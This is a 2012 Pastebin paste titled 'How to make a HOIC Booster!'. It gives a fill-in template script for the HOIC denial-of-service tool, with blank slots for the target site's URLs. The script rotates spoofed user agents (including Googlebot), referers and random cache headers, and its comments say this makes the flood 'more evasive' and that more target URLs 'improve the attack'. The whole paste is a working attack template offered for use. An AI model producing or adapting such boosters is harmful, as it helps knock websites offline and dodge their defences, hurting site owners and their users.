Advertisement
Sumo

How to make a HOIC Booster! by Sumo

Apr 3rd, 2012
4,769
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.38 KB | None | 0 0
  1. How to make a HOIC Booster! :D
  2.  
  3. Ok simply just take the template I have made below and in randURLs.Append "" put the link for the site you want to attack in like so (randURLs.Append "www.target.com) and if you notice there is another set of randURLs lower down, the link you put first in the top set has to be first in the bottom set, compare this with http://pastebin.com/7yJ7vj3u all you have to do is add randURLs. I hope you guys understand now!! :D
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13.  
  14. Dim useragents() as String
  15. Dim referers() as String
  16. dim randheaders() as string
  17. Dim randURLs() as string
  18.  
  19. // populate rotating urls
  20. // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
  21. randURLs.Append ""
  22. randURLs.Append ""
  23. randURLs.Append ""
  24. randURLs.Append ""
  25. randURLs.Append ""
  26. randURLs.Append ""
  27. randURLs.Append ""
  28. randURLs.Append ""
  29. randURLs.Append ""
  30. randURLs.Append ""
  31.  
  32. // rotate out url
  33. URL = randURLs(RndNumber(0, randURLs.UBound))
  34.  
  35. // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
  36.  
  37. // populate list
  38. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
  39. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
  40. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
  41. useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  42. useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  43. useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
  44. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
  45. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
  46. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
  47. useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
  48. useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
  49. useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
  50. useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
  51. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
  52. useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
  53. useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"
  54.  
  55. // populate referer list
  56. referers.Append "http://www.google.com/?q=Sumo+will+not+stop"
  57. referers.Append "http://www.google.com/?q=anonymous+hacker"
  58. referers.Append "http://www.google.com/?q=Open+wifi+to+all"
  59. referers.Append "http://www.google.com/?q=anonymous+cataclysm+leader"
  60. referers.Append URL
  61. randURLs.Append ""
  62. randURLs.Append ""
  63. randURLs.Append ""
  64. randURLs.Append ""
  65. randURLs.Append ""
  66. randURLs.Append ""
  67. randURLs.Append ""
  68. randURLs.Append ""
  69. randURLs.Append ""
  70. randURLs.Append ""
  71.  
  72. // Add random headers
  73. randheaders.Append "Cache-Control: no-cache"
  74. randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
  75. randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
  76. randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
  77. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  78. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
  79. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
  80. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
  81. randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
  82. randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
  83. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  84. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  85. randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
  86. randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
  87. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
  88. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
  89. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  90. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
  91. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
  92. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"
  93.  
  94. Headers.Append "Keep-Alive: 115"
  95. Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
  96. Headers.Append "Connection: keep-alive"
  97.  
  98. // ------------------ DO NOT EDIT BELOW THIS LINE
  99.  
  100. // generate random referer
  101. Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
  102. // generate random user agent (DO NOT MODIFY THIS LINE)
  103. Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
  104. // Generate random headers
  105. Headers.Append randheaders(RndNumber(0, randheaders.UBound))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement